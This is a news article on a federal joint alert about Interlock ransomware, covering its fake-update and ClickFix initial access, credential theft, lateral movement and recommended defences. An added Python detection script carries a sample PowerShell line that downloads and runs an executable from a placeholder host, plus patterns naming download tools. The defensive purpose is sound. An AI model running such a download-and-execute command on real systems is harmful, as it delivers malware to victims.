Feds: Interlock ransomware targeting critical industries with evasive tactics

Interlock threat actors are already racking up healthcare victims, using unique tactics that trick users into downloading malicious payloads.
By admin
Jul 28, 2025, 2:34 PM

Interlock ransomware threat actors are aggressively targeting a host of US and European industries with unique attack methods designed to evade typical preventative defense strategies, according to a joint federal alert.

The FBI, Department of Health and Human Services (HHS), Cybersecurity and Infrastructure Security Agency (CISA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) warn that Interlock first gains access through drive-by downloads from compromised, legitimate websites and through social engineering tactics.

Network defenders in the healthcare sector and other critical infrastructure organizations are being urged to review the shared tactics and indicators of compromise (IOCs) to reduce the risk to the enterprise.

Multiple healthcare victims have already been compromised, including Kettering Health. In June, the health system confirmed Interlock breached the network and exfiltrated data in a May cyberattack against its 14 medical centers and 120 outpatient care sites.

Statements from Kettering Health officials throughout the incident noted the Interlock ransomware attack disrupted phone lines, most of its IT applications, and “patient appointments where IT applications are a necessary part of care plans.”

“In healthcare, these events often range from 10 to 20 days in duration,” said Kettering Health CEO Mike Gentry, in a May 23 update.

Interlock tactics and recommended remediation

Researchers first discovered Interlock ransomware in September 2024, leveraging several unique tactics to gain access to victim networks. In successful attacks, the group has been seen using a customized backdoor, disguising the malicious nature of its payloads, and applying other tailored methods to increase the likelihood of success.

“Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software,” according to the alert.

In some instances, the alert warns, the actors have been observed using a “ClickFix” social engineering technique: the user is prompted to “fix” a supposed issue on their system, but the steps they are told to follow actually execute the malicious payload.

After gaining initial access, the threat actors leverage a host of methods to move laterally across the network to plan their further attacks, steal credentials, and proliferate to connected systems on the network.

Further, the FBI has observed Interlock leveraging a series of PowerShell commands to download a credential stealer and keylogger binary after initial access. The alert shows “the credential stealer collects login information and associated URLs for victims’ online accounts, while the keylogger dynamic link library (DLL) logs users’ keystrokes.”

Researchers have also found that successful Interlock infections execute other information stealers to harvest credentials for lateral movement and privilege escalation. The attackers then move between systems using the stolen credentials and Remote Desktop Protocol (RDP), as well as tools like AnyDesk and PuTTY.
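As an added illustration (not code from the advisory or from this article), the following Python shows how a defender might flag the behaviours described above in process-creation telemetry: a PowerShell download cradle launched from a user-facing process (the fake-update or ClickFix chain), a DLL loaded via rundll32 from a user-writable path (the keylogger DLL), and execution of remote-access tools such as AnyDesk or PuTTY. The event records are constructed Sysmon-style samples, and the field names and patterns are assumptions for the example.

```python
import re

# Constructed Sysmon-style process-creation records (sample data, not real Interlock IoCs).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -w hidden -c \"iwr http://updates.example/chrome_update.exe "
            "-OutFile $env:TEMP\\cu.exe; start $env:TEMP\\cu.exe\""},
    {"parent": "powershell.exe", "image": "rundll32.exe",
     "cmd": "rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\kl.dll,Start"},
    {"parent": "explorer.exe", "image": "AnyDesk.exe",
     "cmd": "C:\\Users\\alice\\Downloads\\AnyDesk.exe"},
    {"parent": "services.exe", "image": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmd": "powershell Get-Process"},
]

# Assumed detection patterns: common PowerShell download cradles, user-writable paths,
# remote-access tools named in the advisory, and parents that indicate user-driven execution.
DOWNLOAD_CRADLE = re.compile(
    r"\b(invoke-webrequest|iwr|downloadstring|downloadfile|curl|wget|bitsadmin)\b", re.I)
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|AppData)\\", re.I)
RAT_TOOLS = {"anydesk.exe", "putty.exe"}
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe"}


def classify(event):
    """Return the list of finding tags for one process-creation event (empty if benign)."""
    findings = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmd"]
    if image == "powershell.exe" and parent in USER_PARENTS and DOWNLOAD_CRADLE.search(cmd):
        findings.append("powershell-download-cradle")   # fake-update / ClickFix style execution
    if image == "rundll32.exe" and USER_WRITABLE.search(cmd):
        findings.append("dll-load-from-user-path")      # DLL (e.g. keylogger) from a writable dir
    if image in RAT_TOOLS:
        findings.append("remote-access-tool")           # AnyDesk/PuTTY used for lateral movement
    return findings


def scan(events):
    """Map event index -> findings for every event that triggered at least one rule."""
    results = {}
    for i, event in enumerate(events):
        findings = classify(event)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], tags)
```

Each rule on its own is noisy; in practice the value comes from correlating them on one host within a short window, which is the chain the advisory describes.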

Interlock has also been observed compromising domain administrator accounts to gain additional privileges.

The ransomware targets Windows and Linux operating systems, as well as virtual machines.

The joint alert shares indicators of compromise (IOCs), additional attack methods and tools, and other tactics for network defenders to review. All organizations are being urged to implement the shared recommended remediation methods to reduce the likelihood of compromise and the impact of a potential attack. The recommended actions align with previously released cross-sector cybersecurity performance goals (CPGs).

Network defenders can prevent Interlock from gaining initial access by leveraging a DNS filter and web access firewalls to block users from accessing malicious applications. NIST password standards should guide requirements for all user accounts, as well as the use of multi-factor authentication.

“Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement,” according to the joint alert. “Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim.”

Urgent defenses and collaborative action needed

The unique and evasive tactics of Interlock ransomware, as demonstrated by successful compromises like that of Kettering Health, underscore the immediate need for robust defense strategies. The joint alert from the FBI, HHS, CISA, and MS-ISAC highlights the importance of collaborative intelligence sharing in combating sophisticated threats like Interlock ransomware. All organizations are urged to meticulously review the shared indicators of compromise and proactively adopt the recommended remediation methods. This includes preventing initial access through DNS filtering and web access firewalls, training users to spot social engineering attempts, mitigating known vulnerabilities through timely patching, segmenting networks to restrict lateral movement, and implementing strong identity and access management policies with mandatory multifactor authentication.

By actively applying these crucial measures, network defenders can not only protect their own enterprises but also contribute to a stronger collective defense against this persistent threat. Further resources and advisories are available at stopransomware.gov as part of the ongoing effort to combat various ransomware variants and threat actors.
